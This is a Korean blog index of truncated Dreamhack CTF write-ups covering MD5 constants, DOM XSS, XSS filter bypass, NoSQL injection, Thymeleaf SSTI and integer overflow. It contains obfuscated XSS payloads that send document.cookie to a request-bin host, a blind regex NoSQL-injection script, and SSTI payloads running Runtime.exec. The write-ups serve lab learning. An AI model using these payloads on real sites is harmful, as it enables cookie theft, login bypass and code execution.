본문 바로가기

hacking sorcerer

(372)
드림핵 해시 브브라우니 브라운 dreamhack 사실 이런 경우 방법은 여러 가지이고 사람마다 다른 방법이 있겠습니다만, 저는 상수를 보았습니다. (왜 상수를 보았냐면, 눈에 띄었기 때문이죠.) 0xd76aa478; 0xe8c7b756; 0x242070db; K [0 .. 3] : = {0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee} K [4 .. 7] : = {0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501} K [8..11] : = {0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be} K [12..15] : = {0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821} K [16..19] : = {0xf61e256..
드림핵 dreamhack fly to the moon 다들 비슷비슷하게 푸는 거 같아서 일부러 나는 내 마음대로 풀어보았다. 특정 조작을 하면 왼쪽 구석에서 무한히 살아갈 수 있다. 그래서 원하는 점수를 얻고 flag 를 얻었다.
dreamhack dom xss from flask import Flask, request, render_template from selenium import webdriver import urllib import os app = Flask(__name__) app.secret_key = os.urandom(32) nonce = os.urandom(16).hex() try: FLAG = open("./flag.txt", "r").read() except: FLAG = "[**FLAG**]" def read_url(url, cookie={"name": "name", "value": "value"}): cookie.update({"domain": "127.0.0.1"}) try: options = webdriver.ChromeOptions..
드림핵 xss filtering bypass advanced ​ ​ 'docu'+'ment'['locatio'+'n'].href = "/memo?memo=" + 'docu'+'ment'+'.cookie;' ​ documen%09t['locatio'+'n'].href = "https://ltiufnz.request.dreamhack.games/?memo=" + documen%09t.cookie; ​ ​ ​ ​ %00a%00l%00e%00r%00t%00'%001%00' d%00o%00c%00u%00m%00e%00n%00t['locatio'+'n'].href = "/memo?memo=" + d%00o%00c%00u%00m%00e%00n%00t.cookie; %00l%00o%00c%00a%00t%00i%00o%00n.href = "https://zcvhcky.reques..
드림핵 호박 게임 굉장히 재미있는 문제이다 이 워게임의 핵심이 되는 js는 이렇게 되어 있다. ​ var pumpkin = [ 124, 112, 59, 73, 167, 100, 105, 75, 59, 23, 16, 181, 165, 104, 43, 49, 118, 71, 112, 169, 43, 53 ]; var counter = 0; var pie = 10; ​ function make() { if (0 < counter && counter
드림핵 mango 쉬워요 import requests import string ​ url = "http://host1.dreamhack.games:22637/login" s = string.digits + string.ascii_uppercase + string.ascii_lowercase + "{}" ​ result = "" for i in range(32): for idx, c in enumerate(s): payload = "?uid[$gt]=adm&uid[$ne]=guest&uid[$lt]=d&upw[$regex]={" + (result+c) print(payload) res = requests.get(url+payload) ​ if res.text.find("admin") != -1: result += s[idx] pr..
드림핵 spring view https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ 가장 기본이 되는 내용 https://www.reddit.com/r/HowToHack/comments/rp0dc5/thymeleaf_ssti_how_do_i_bypass_the_filtering/ __${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime')...}__::.x __${T(java.lang.Runtime).getRuntime().exec("id")}__::.x ​ nc host1.dreamhack.games 13459 여기로 들어가서 슛 때려도 괜찮다 그렇긴 한데 역시 웹 상에서 바로 아는 게 제일 편하긴 하다 ​ /(${T(ja..
드림핵 sint 이론적 기반은 아주 간단하다 Type Error라는 간단한 취약점에 의거하고 있는데 이는 개발자가 기본적으로 선택해주는 변수 크기에서 나오는 취약점이라고 할 수 있다 컴파일러는 개발자가 정해준 변수 크기를 따라서 메모리를 불러다가 계산하는데 만약 더해진 값이든 조작한 값이든 그 값이 그 크기 자체를 벗어나게 되면 값이 적어지든 커지든 하는 문제가 발생할 수 있다 ​ 이 문제는 버퍼 오버플로우를 일으키면 flag를 주겠다고 간단한 요구를 하고 있다 signal(SIGSEGV, get_shell); ​ 그런데 밑에 보니 if (size > 256 || size < 0) { printf("Buffer Overflow!\n"); exit(0); } 이런 식으로 나름 버퍼 오버플로우를 감지하려 하고 있다 size..